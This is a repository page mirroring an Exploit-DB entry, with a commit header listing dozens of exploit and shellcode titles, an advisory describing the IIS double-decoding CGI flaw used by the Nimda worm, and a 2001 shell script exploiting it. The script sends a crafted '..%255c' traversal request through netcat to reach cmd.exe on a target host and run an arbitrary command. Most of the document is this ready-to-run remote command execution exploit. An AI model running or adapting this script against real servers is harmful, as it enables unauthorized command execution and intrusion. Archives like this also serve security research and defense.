bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/20839.sh
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

72 lines
No EOL
2.2 KiB
Bash
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/2708/info
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
2. When the security check is completed, IIS decodes CGI parameters.
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
The worm Nimda(and variants) actively exploit this vulnerability.
#!/bin/sh
# Copyright 2001 by Leif Jakob <bugtraq@jakob.weite-welt.com>
#
# do not abuse this code... blah blah :)
if [ -z "$1" ] ; then
echo "usage:"
echo "$0 hostname"
exit 1
fi
host="$1"
NETCAT=`which netcat`
if [ -z "$NETCAT" ] ; then
NETCAT=`which nc`
fi
if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
echo "you need netcat to make this work"
exit 1
fi
echo "using netcat:$NETCAT"
function makeRequest
{
host="$1"
count=$2
cmd="$3"
echo -n 'GET /scripts/'
while [ $count -gt 0 ] ; do
echo -n '..%255c'
count=$((count-1))
done
echo -n 'winnt/system32/cmd.exe?/c+'
echo -n "$cmd"
echo ' HTTP/1.0'
echo "Host: $host"
echo ''
echo 'dummy'
}
function testHost
{
host="$1"
count=10 # you can't overdo it
cmd='dir+c:\'
makeRequest "$host" "$count" "$cmd" | netcat -w 4 $host 80
}
testHost "$host"
Reference in a new issue View git blame Copy permalink